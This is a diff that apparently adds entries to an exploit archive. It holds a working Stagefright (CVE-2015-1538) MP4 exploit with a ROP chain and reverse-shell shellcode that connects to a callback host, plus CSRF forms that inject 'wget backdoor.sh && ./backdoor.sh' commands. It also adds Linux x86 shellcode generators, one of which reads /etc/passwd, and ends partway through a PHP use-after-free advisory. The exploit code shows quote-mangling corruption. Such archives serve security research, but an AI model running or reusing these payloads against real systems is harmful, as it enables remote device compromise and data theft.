diff --git a/files.csv b/files.csv
index 3b46cc8d3..f16e1f5ff 100755
--- a/files.csv
+++ b/files.csv
@@ -34403,6 +34403,7 @@ id,file,description,date,author,platform,type,port
 38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include Vulnerability",2012-12-30,Amirh03in,php,webapps,0
 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection Vulnerability",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection Vulnerability",2012-12-04,AkaStep,php,webapps,0
+38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit (Shell Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
@@ -34410,3 +34411,17 @@ id,file,description,date,author,platform,type,port
 38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
 38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0
+38111,platforms/php/webapps/38111.txt,"Wordpress Simple Gmail Login Plugin Stack Trace Information Disclosure Vulnerability",2012-12-07,"Aditya Balapure",php,webapps,0
+38112,platforms/php/webapps/38112.txt,"FOOT Gestion 'id' Parameter SQL Injection Vulnerability",2012-12-07,"Emmanuel Farcy",php,webapps,0
+38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module SQL Injection Vulnerability",2012-12-08,"Cold Zero",php,webapps,0
+38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0
+38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0
+38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
+38118,platforms/xml/webapps/38118.txt,"Qlikview <= 11.20 SR11 - Blind XXE Injection Vulnerability",2015-09-09,"Alex Haynes",xml,webapps,0
+38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - CSRF Vulnerability",2015-09-09,"Aryan Bayaninejad",php,webapps,0
+38120,platforms/php/dos/38120.txt,"PHP SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38122,platforms/php/dos/38122.txt,"PHP SplObjectStorage unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
+38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
diff --git a/platforms/android/remote/38124.py b/platforms/android/remote/38124.py
new file mode 100755
index 000000000..8318d614c
--- /dev/null
+++ b/platforms/android/remote/38124.py
@@ -0,0 +1,377 @@
+#!/usr/bin/env python
+# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
+# Shout outs to our friends at Optiv (formerly Accuvant Labs)
+# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
+# www.zimperium.com
+#
+# Exploit for RCE Vulnerability CVE-2015-1538 #1
+# Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling
+#
+# Don’t forget, the output of “create_mp4” can be delivered many ways!
+# MMS is the most dangerous attack vector, but not the only one…
+#
+# DISCLAIMER: This exploit is for testing and educational purposes only. Any
+# other usage for this code is not allowed. Use at your own risk.
+#
+# “With great power comes great responsibility.” – Uncle Ben
+#
+import struct
+import socket
+#
+# Creates a single MP4 atom – LEN, TAG, DATA
+#
+def make_chunk(tag, data):
+   if len(tag) != 4:
+       raise ‘Yo! They call it “FourCC” for a reason.’
+   ret = struct.pack(‘>L’, len(data) + 8)
+   ret += tag
+   ret += data
+   return ret
+#
+# Make an ‘stco’ atom – Sample Table Chunk Offets
+#
+def make_stco(extra=”):
+   ret =  struct.pack(‘>L’, 0) # version
+   ret += struct.pack(‘>L’, 0) # mNumChunkOffsets
+   return make_chunk(‘stco’, ret+extra)
+#
+# Make an ‘stsz’ atom – Sample Table Size
+#
+def make_stsz(extra=”):
+   ret =  struct.pack(‘>L’, 0) # version
+   ret += struct.pack(‘>L’, 0) # mDefaultSampleSize
+   ret += struct.pack(‘>L’, 0) # mNumSampleSizes
+   return make_chunk(‘stsz’, ret+extra)
+#
+# Make an ‘stts’ atom – Sample Table Time-to-Sample
+#
+def make_stts():
+   ret =  struct.pack(‘>L’, 0) # version
+   ret += struct.pack(‘>L’, 0) # mTimeToSampleCount
+   return make_chunk(‘stts’, ret)
+#
+# This creates a single Sample Table Sample-to-Chunk entry
+#
+def make_stsc_entry(start, per, desc):
+   ret = ”
+   ret += struct.pack(‘>L’, start + 1)
+   ret += struct.pack(‘>L’, per)
+   ret += struct.pack(‘>L’, desc)
+   return ret
+#
+# Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk
+#
+# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
+# cause a heap overflow.
+#
+def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
+   ret =  struct.pack(‘>L’, 0) # version/flags
+   # this is the clean version…
+   if not do_overflow:
+       ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets
+       ret += ‘Z’ * (12 * num_alloc)
+       return make_chunk(‘stsc’, ret)
+
+   # now the explicit version. (trigger the bug)
+   ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
+   # fill in the entries that will overflow the buffer
+   for x in range(0, num_write):
+       ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
+
+   ret = make_chunk(‘stsc’, ret)
+
+   # patch the data_size
+   ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:]
+
+   return ret
+
+#
+# Build the ROP chain
+#
+# ROP pivot by Georg Wicherski! Thanks!
+#
+“””
+(gdb) x/10i __dl_restore_core_regs
+  0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
+  0xb0002854 <__dl_restore_core_regs+4>:   ldm r1, {r3, r4, r5}
+  0xb0002858 <__dl_restore_core_regs+8>:   push    {r3, r4, r5}
+  0xb000285c <__dl_restore_core_regs+12>:  ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
+  0xb0002860 <__dl_restore_core_regs+16>:  ldm sp, {sp, lr, pc}
+“””
+“””
+b0001144 <__dl_mprotect>:
+b0001144:       e92d0090        push    {r4, r7}
+b0001148:       e3a0707d        mov     r7, #125        ; 0x7d
+b000114c:       ef000000        svc     0x00000000
+b0001150:       e8bd0090        pop     {r4, r7}
+b0001154:       e1b00000        movs    r0, r0
+b0001158:       512fff1e        bxpl    lr
+b000115c:       ea0015cc        b       b0006894 <__dl_raise+0x10>
+“””
+def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
+   rop = ”
+   rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp
+   rop += struct.pack(‘<L’, 0xb0002a98)           # new lr – pop {pc}
+   rop += struct.pack(‘<L’, 0xb00038b2+1)         # new pc: pop {r0, r1, r2, r3, r4, pc}
+
+   rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned)
+   rop += struct.pack(‘<L’, 0x1000)               # new r1 – length
+   rop += struct.pack(‘<L’, 7)                    # new r2 – protection
+   rop += struct.pack(‘<L’, 0xd000d003)           # new r3 – scratch
+   rop += struct.pack(‘<L’, 0xd000d004)           # new r4 – scratch
+   rop += struct.pack(‘<L’, 0xb0001144)           # new pc – _dl_mprotect
+
+   native_start = sp_addr + 0x80
+   rop += struct.pack(‘<L’, native_start)         # address of native payload
+   #rop += struct.pack(‘<L’, 0xfeedfed5)          # top of stack…
+   # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
+   buf =  ”
+   # fork
+   buf += ‘\x02\x70\xa0\xe3’
+   buf += ‘\x00\x00\x00\xef’
+   # continue if not parent…
+   buf += ‘\x00\x00\x50\xe3’
+   buf += ‘\x02\x00\x00\x0a’
+   # exit parent
+   buf += ‘\x00\x00\xa0\xe3’
+   buf += ‘\x01\x70\xa0\xe3’
+   buf += ‘\x00\x00\x00\xef’
+   # setsid in child
+   buf += ‘\x42\x70\xa0\xe3’
+   buf += ‘\x00\x00\x00\xef’
+   # socket/connect/dup2/dup2/dup2
+   buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’
+   buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’
+   buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’
+   buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’
+   buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’
+   buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’
+   buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’
+   buf += ‘\xe3\x00\x00\x00\xef’
+   # execve(shell, argv, env)
+   buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’
+   buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’
+   buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’
+   buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’
+   buf += ‘\xef\x02\x00’
+   # Add the connect back host/port
+   buf += struct.pack(‘!H’, cb_port)
+   cb_host = socket.inet_aton(cb_host)
+   buf += struct.pack(‘=4s’, cb_host)
+   # shell –
+   buf += ‘/system/bin/sh\x00\x00’
+   # argv –
+   buf += ‘sh\x00\x00’
+   # env –
+   buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’
+
+   # Add some identifiable stuff, just in case something goes awry…
+   rop_start_off = 0x34
+   x = rop_start_off + len(rop)
+   while len(rop) < 0x80 – rop_start_off:
+       rop += struct.pack(‘<L’, 0xf0f00000+x)
+       x += 4
+
+   # Add the native payload…
+   rop += buf
+
+   return rop
+
+#
+# Build an mp4 that exploits CVE-2015-1538 #1
+#
+# We mimic meow.3gp here…
+#
+def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
+   chunks = []
+
+   # Build the MP4 header…
+   ftyp =  ‘mp42’
+   ftyp += struct.pack(‘>L’, 0)
+   ftyp += ‘mp42’
+   ftyp += ‘isom’
+   chunks.append(make_chunk(‘ftyp’, ftyp))
+
+   # Note, this causes a few allocations…
+   moov_data = ”
+   moov_data += make_chunk(‘mvhd’,
+       struct.pack(‘>LL’, 0, 0x41414141) +
+       (‘B’ * 0x5c) )
+
+   # Add a minimal, verified trak to satisfy mLastTrack being set
+   moov_data += make_chunk(‘trak’,
+       make_chunk(‘stbl’,
+           make_stsc(0x28, 0x28) +
+           make_stco() +
+           make_stsz() +
+           make_stts() ))
+
+   # Spray the heap using a large tx3g chunk (can contain binary data!)
+   “””
+      0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>:   ldr r4, [r0, #4]  ; load mRefs
+      0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>:   mov r5, r0
+      0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>:   mov r6, r1
+      0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>:   mov r0, r4
+      0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>:  blx 0x40069884    ; atomic_decrement
+      0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>:  cmp r0, #1        ; must be 1
+      0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>:  bne.n   0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
+      0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>:  ldr r0, [r4, #8]  ; load refs->mBase
+      0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>:  ldr r1, [r0, #0]  ; load mBase._vptr
+      0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>:  ldr r2, [r1, #12] ; load method address
+      0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>:  mov r1, r6
+      0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>:  blx r2            ; call it!
+   “””
+   page = ”
+   off = 0  # the offset to the next object
+   off += 8
+   page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28)    # _vptr.RefBase (for when we smash mDataSource)
+   page += struct.pack(‘<L’, sp_addr + off) # mRefs
+   off += 16
+   page += struct.pack(‘<L’, 1)             # mStrong
+   page += struct.pack(‘<L’, 0xc0dedbad)    # mWeak
+   page += struct.pack(‘<L’, sp_addr + off) # mBase
+   page += struct.pack(‘<L’, 16)            # mFlags (dont set OBJECT_LIFETIME_MASK)
+   off += 8
+   page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase
+   page += struct.pack(‘<L’, 0xf00dbabe)    # mBase.mRefs (unused)
+   off += 16
+   page += struct.pack(‘<L’, 0xc0de0000 + 0x00)  # vtable entry 0
+   page += struct.pack(‘<L’, 0xc0de0000 + 0x04)  # vtable entry 4
+   page += struct.pack(‘<L’, 0xc0de0000 + 0x08)  # vtable entry 8
+   page += struct.pack(‘<L’, newpc_val)          # vtable entry 12
+   rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
+   x = len(page)
+   while len(page) < 4096:
+       page += struct.pack(‘<L’, 0xf0f00000+x)
+       x += 4
+
+   off = 0x34
+   page = page[:off] + rop + page[off+len(rop):]
+   spray = page * (((2*1024*1024) / len(page)) – 20)
+   moov_data += make_chunk(‘tx3g’, spray)
+   block = ‘A’ * 0x1c
+   bigger = ‘B’ * 0x40
+   udta = make_chunk(‘udta’,
+       make_chunk(‘meta’,
+           struct.pack(‘>L’, 0) +
+           make_chunk(‘ilst’,
+               make_chunk(‘cpil’,    make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) +
+               make_chunk(‘trkn’,    make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) +
+               make_chunk(‘disk’,    make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) +
+               make_chunk(‘covr’,    make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +
+               make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
+               make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
+               make_chunk(‘aART’,    make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
+               make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
+               make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
+               make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
+               make_chunk(‘gnre’,    make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) +
+               make_chunk(‘covr’,    make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +
+               make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +
+               make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +
+               make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)))
+           )
+       )
+   moov_data += udta
+
+   # Make the nasty trak
+   tkhd1 = ”.join([
+       ‘\x00’,       # version
+       ‘D’ * 3,      # padding
+       ‘E’ * (5*4),  # {c,m}time, id, ??, duration
+       ‘F’ * 0x10,   # ??
+       struct.pack(‘>LLLLLL’,
+           0x10000,  # a00
+           0,        # a01
+           0,        # dx
+           0,        # a10
+           0x10000,  # a11
+           0),       # dy
+       ‘G’ * 0x14
+       ])
+
+   trak1 = ”
+   trak1 += make_chunk(‘tkhd’, tkhd1)
+
+   mdhd1 = ”.join([
+       ‘\x00’,       # version
+       ‘D’ * 0x17,   # padding
+       ])
+
+   mdia1 = ”
+   mdia1 += make_chunk(‘mdhd’, mdhd1)
+   mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a)
+
+   dinf1 = ”
+   dinf1 += make_chunk(‘dref’, ‘H’ * 0x14)
+
+   minf1 = ”
+   minf1 += make_chunk(‘smhd’, ‘G’ * 0x08)
+   minf1 += make_chunk(‘dinf’, dinf1)
+
+   # Build the nasty sample table to trigger the vulnerability here.
+   stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER
+
+   # Add the stbl to the minf chunk
+   minf1 += make_chunk(‘stbl’, stbl1)
+
+   # Add the minf to the mdia chunk
+   mdia1 += make_chunk(‘minf’, minf1)
+
+   # Add the mdia to the track
+   trak1 += make_chunk(‘mdia’, mdia1)
+
+   # Add the nasty track to the moov data
+   moov_data += make_chunk(‘trak’, trak1)
+
+   # Finalize the moov chunk
+   moov = make_chunk(‘moov’, moov_data)
+   chunks.append(moov)
+
+   # Combine outer chunks together and voila.
+   data = ”.join(chunks)
+
+   return data
+
+if __name__ == ‘__main__’:
+   import sys
+   import mp4
+   import argparse
+
+   def write_file(path, content):
+       with open(path, ‘wb’) as f:
+           f.write(content)
+
+   def addr(sval):
+       if sval.startswith(‘0x’):
+           return int(sval, 16)
+       return int(sval)
+
+   # The address of a fake StrongPointer object (sprayed)
+   sp_addr   = 0x41d00010  # takju @ imm76i – 2MB (via hangouts)
+
+   # The address to of our ROP pivot
+   newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
+
+   # Allow the user to override parameters
+   parser = argparse.ArgumentParser()
+   parser.add_argument(‘-c’, ‘–connectback-host’, dest=‘cbhost’, default=‘31.3.3.7’)
+   parser.add_argument(‘-p’, ‘–connectback-port’, dest=‘cbport’, type=int, default=12345)
+   parser.add_argument(‘-s’, ‘–spray-address’, dest=‘spray_addr’, type=addr, default=None)
+   parser.add_argument(‘-r’, ‘–rop-pivot’, dest=‘rop_pivot’, type=addr, default=None)
+   parser.add_argument(‘-o’, ‘–output-file’, dest=‘output_file’, default=‘cve-2015-1538-1.mp4’)
+   args = parser.parse_args()
+
+   if len(sys.argv) == 1:
+       parser.print_help()
+       sys.exit(–1)
+
+   if args.spray_addr == None:
+       args.spray_addr = sp_addr
+   if args.rop_pivot == None:
+       args.rop_pivot = newpc_val
+
+   # Build the MP4 file…
+   data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
+   print(‘[*] Saving crafted MP4 to %s …’ % args.output_file)
+   write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf
\ No newline at end of file
diff --git a/platforms/cgi/webapps/38114.html b/platforms/cgi/webapps/38114.html
new file mode 100755
index 000000000..601e0dfda
--- /dev/null
+++ b/platforms/cgi/webapps/38114.html
@@ -0,0 +1,62 @@
+source: http://www.securityfocus.com/bid/56881/info
+
+Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.
+
+Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
+
+Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. 
+
+1.
+
+<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl" 
+method="post" name=f1>
+<input type="hidden" name="platformDD2" value='android' />
+<input type="hidden" name="hostingPath" value='a & wget 
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch && 
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>
+
+2. 
+
+<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl" 
+method="post" name=f1>
+<input type="hidden" name="hostingPath" value='a & wget 
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>
+
+3.
+
+<form 
+action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl" 
+method="post" name=f1>
+<input type="hidden" name="appURLPath" value='a & wget 
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>
+
+4.
+
+<form 
+action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl" 
+method="post" name=f1>
+<input type="hidden" name="ipAddressTB" value='a & wget 
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>
diff --git a/platforms/lin_x86/shellcode/38094.c b/platforms/lin_x86/shellcode/38094.c
new file mode 100755
index 000000000..009c08a50
--- /dev/null
+++ b/platforms/lin_x86/shellcode/38094.c
@@ -0,0 +1,72 @@
+#!/bin/python
+from sys import argv
+
+"""
+Shellcode Generator...
+Create file with permission 7775
+
+---------------------------------------------------------------------------------
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060:	eb 12                	jmp    0x8048074
+ 8048062:	5b                   	pop    %ebx
+ 8048063:	31 c0                	xor    %eax,%eax
+ 8048065:	88 43 05             	mov    %al,0x5(%ebx)
+ 8048068:	b0 08                	mov    $0x8,%al
+ 804806a:	b1 ff                	mov    $0xff,%cl
+ 804806c:	b5 ff                	mov    $0xff,%ch
+ 804806e:	cd 80                	int    $0x80
+ 8048070:	b0 01                	mov    $0x1,%al
+ 8048072:	cd 80                	int    $0x80
+ 8048074:	e8 e9 ff ff ff       	call   0x8048062
+ 8048079:	61                   	popa   
+ 804807a:	6a 69                	push   $0x69
+ 804807c:	74 68                	je     0x80480e6
+ 804807e:	23                   	.byte 0x23
+ ---------------------------------------------------------------------------------
+ b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
+ 
+ Om Asato Maa Sad-Gamaya |
+ Tamaso Maa Jyotir-Gamaya |
+ Mrtyor-Maa Amrtam Gamaya |
+ Om Shaantih Shaantih Shaantih |
+"""
+
+bann3r = '''
+/*
+    [][][][][][][][][][][][][][][][][][][][][][][]
+    []                                          []
+    []      c0d3d by Ajith Kp [ajithkp560]      []
+    []   http://www.terminalcoders.blogspot.in  []
+    []                                          []
+    [][][][][][][][][][][][][][][][][][][][][][][]
+*/
+'''
+sh3ll = "\\xeb\\x12\\x5b\\x31\\xc0\\x88\\x43"
+sh311 ="\\xb0\\x08\\xb1\\xff\\xb5\\xff\\xcd\\x80\\xb0\\x01\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff"
+print bann3r
+if len(argv)<1:
+    print 'Usage: '+argv[0]+' name_of_file'
+else:
+    fil3 = argv[1]
+    h3x = ''
+    for i in range(len(fil3)):
+        h3x+=str('\\'+hex(ord(fil3[i]))[1:])
+    h3x+=str('\\' + 'x23')
+    l3n = '\\x'+hex((len(fil3)))[2:].zfill(2)
+    sh = str(sh3ll) + str(l3n) + str(sh311) + str(h3x)
+    print '// Compile with'
+    print '// $ gcc -o output source.c'
+    print '// $ execstack -s output'
+    print '// $ ./output'
+    print '////////////////////////////////////////////\n'
+    print '# include <stdio.h>'
+    print 'char sh[] = "'+sh+'";'
+    print 'main(int argc, char **argv)'
+    print '''{
+            int (*func)();
+            func = (int (*)()) sh;
+            (int)(*func)();'''
+    print '}'
+    print '\n////////////////////////////////////////////'
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/38116.c b/platforms/lin_x86/shellcode/38116.c
new file mode 100755
index 000000000..276469dce
--- /dev/null
+++ b/platforms/lin_x86/shellcode/38116.c
@@ -0,0 +1,76 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+# Linux/x86 - execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL) - 75 bytes
+# Tested in Zorin OS 10 x86
+# Author: Ajith Kp
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060:	eb 1f                	jmp    0x8048081
+ 8048062:	5b                   	pop    %ebx
+ 8048063:	31 c0                	xor    %eax,%eax
+ 8048065:	88 43 0b             	mov    %al,0xb(%ebx)
+ 8048068:	88 43 18             	mov    %al,0x18(%ebx)
+ 804806b:	89 5b 19             	mov    %ebx,0x19(%ebx)
+ 804806e:	8d 4b 0c             	lea    0xc(%ebx),%ecx
+ 8048071:	89 4b 1d             	mov    %ecx,0x1d(%ebx)
+ 8048074:	89 43 21             	mov    %eax,0x21(%ebx)
+ 8048077:	b0 0b                	mov    $0xb,%al
+ 8048079:	8d 4b 19             	lea    0x19(%ebx),%ecx
+ 804807c:	8d 53 21             	lea    0x21(%ebx),%edx
+ 804807f:	cd 80                	int    $0x80
+ 8048081:	e8 dc ff ff ff       	call   0x8048062
+ 8048086:	2f                   	das    
+ 8048087:	2f                   	das    
+ 8048088:	2f                   	das    
+ 8048089:	2f                   	das    
+ 804808a:	62 69 6e             	bound  %ebp,0x6e(%ecx)
+ 804808d:	2f                   	das    
+ 804808e:	63 61 74             	arpl   %sp,0x74(%ecx)
+ 8048091:	23 2f                	and    (%edi),%ebp
+ 8048093:	2f                   	das    
+ 8048094:	65 74 63             	gs je  0x80480fa
+ 8048097:	2f                   	das    
+ 8048098:	70 61                	jo     0x80480fb
+ 804809a:	73 73                	jae    0x804810f
+ 804809c:	77 64                	ja     0x8048102
+ 804809e:	23 41 4a             	and    0x4a(%ecx),%eax
+ 80480a1:	49                   	dec    %ecx
+ 80480a2:	54                   	push   %esp
+ 80480a3:	48                   	dec    %eax
+ 80480a4:	41                   	inc    %ecx
+ 80480a5:	4a                   	dec    %edx
+ 80480a6:	49                   	dec    %ecx
+ 80480a7:	54                   	push   %esp
+ 80480a8:	48                   	dec    %eax
+ 80480a9:	4b                   	dec    %ebx
+ 80480aa:	50                   	push   %eax
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o cat_etc_passwd cat_etc_passwd.c
+$ execstack -s cat_etc_passwd
+$ ./cat_etc_passwd
+
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\xeb\x1f\x5b\x31\xc0\x88\x43\x0b\x88\x43\x18\x89\x5b\x19\x8d\x4b\x0c\x89\x4b\x1d\x89\x43\x21\xb0\x0b\x8d\x4b\x19\x8d\x53\x21\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x63\x61\x74\x23\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x4a\x49\x54\x48\x41\x4a\x49\x54\x48\x4b\x50";
+// It will create file named 'ajith' with permission 7775
+void main(int argc, char **argv)
+{
+	int (*func)();
+	func = (int (*)()) sh;
+	(int)(*func)();
+}
diff --git a/platforms/php/dos/38120.txt b/platforms/php/dos/38120.txt
new file mode 100755
index 000000000..d242d90dd
--- /dev/null
+++ b/platforms/php/dos/38120.txt
@@ -0,0 +1,103 @@
+Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
+
+Taoguang Chen <[@chtg](http://github.com/chtg)> - 
+Write Date: 2015.8.27 
+Release Date: 2015.9.4
+
+A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+Affected is PHP 5.5 < 5.5.29
+Affected is PHP 5.4 < 5.4.45
+
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+
+Description
+------------
+
+
+  while(*p == ':') {
+    ++p;
+    ALLOC_INIT_ZVAL(elem);
+    if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+      zval_ptr_dtor(&elem);
+      goto error;
+    }
+
